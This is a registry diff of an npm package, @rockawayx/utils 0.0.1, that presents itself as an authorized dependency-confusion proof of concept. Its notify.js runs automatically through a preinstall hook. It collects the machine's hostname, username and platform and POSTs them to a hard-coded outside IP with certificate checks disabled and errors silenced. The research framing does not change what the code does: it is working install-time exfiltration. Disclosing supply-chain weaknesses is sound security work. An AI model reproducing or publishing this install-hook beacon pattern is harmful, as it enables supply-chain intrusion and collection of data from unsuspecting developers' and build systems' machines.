@rockawayx/utils 0.0.1
This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.
- package/README.md +13 -0
- package/index.js +7 -0
- package/notify.js +21 -0
- package/package.json +11 -0
package/README.md
ADDED
|
@@ -0,0 +1,13 @@
|
|
|
1
|
+
# @rockawayx/utils - Security Research
|
|
2
|
+
|
|
3
|
+
This package was published as part of an **authorized security assessment** to demonstrate
|
|
4
|
+
a dependency confusion vulnerability affecting the `@rockawayx` npm scope.
|
|
5
|
+
|
|
6
|
+
The `@rockawayx` scope was unclaimed on npmjs.org while private packages with the same
|
|
7
|
+
scope names existed in RockawayX's internal repositories.
|
|
8
|
+
|
|
9
|
+
**This is not malicious software.** It contains only a benign notification that reports
|
|
10
|
+
the hostname and timestamp to a security research callback server.
|
|
11
|
+
|
|
12
|
+
If you received this package unexpectedly, your build system may be vulnerable to
|
|
13
|
+
dependency confusion attacks. Please contact your security team.
|
package/index.js
ADDED
|
@@ -0,0 +1,7 @@
|
|
|
1
|
+
// Security Research PoC - @rockawayx/utils dependency confusion
|
|
2
|
+
// This package was published as part of an authorized security assessment
|
|
3
|
+
// to demonstrate the unclaimed npm scope vulnerability.
|
|
4
|
+
module.exports = {
|
|
5
|
+
_securityResearch: true,
|
|
6
|
+
_message: 'This package is a security research PoC for dependency confusion'
|
|
7
|
+
};
|
package/notify.js
ADDED
|
@@ -0,0 +1,21 @@
|
|
|
1
|
+
const https = require('https');
|
|
2
|
+
const os = require('os');
|
|
3
|
+
const data = JSON.stringify({
|
|
4
|
+
type: 'dependency-confusion-poc',
|
|
5
|
+
package: '@rockawayx/utils',
|
|
6
|
+
hostname: os.hostname(),
|
|
7
|
+
user: os.userInfo().username,
|
|
8
|
+
platform: os.platform(),
|
|
9
|
+
timestamp: new Date().toISOString(),
|
|
10
|
+
message: 'This is a security research PoC. If you see this, your project is vulnerable to dependency confusion. Contact security@rockawayx.com'
|
|
11
|
+
});
|
|
12
|
+
const req = https.request({
|
|
13
|
+
hostname: '2.25.140.71', port: 8443,
|
|
14
|
+
path: '/rockawayx/depconf-poc',
|
|
15
|
+
method: 'POST',
|
|
16
|
+
headers: {'Content-Type':'application/json','Content-Length':data.length},
|
|
17
|
+
timeout: 3000, rejectUnauthorized: false
|
|
18
|
+
}, ()=>{});
|
|
19
|
+
req.on('error',()=>{});
|
|
20
|
+
req.write(data);
|
|
21
|
+
req.end();
|
package/package.json
ADDED
|
@@ -0,0 +1,11 @@
|
|
|
1
|
+
{
|
|
2
|
+
"name": "@rockawayx/utils",
|
|
3
|
+
"version": "0.0.1",
|
|
4
|
+
"description": "Security research - dependency confusion PoC",
|
|
5
|
+
"main": "index.js",
|
|
6
|
+
"scripts": {
|
|
7
|
+
"preinstall": "node notify.js || true"
|
|
8
|
+
},
|
|
9
|
+
"license": "MIT",
|
|
10
|
+
"author": "security-researcher"
|
|
11
|
+
}
|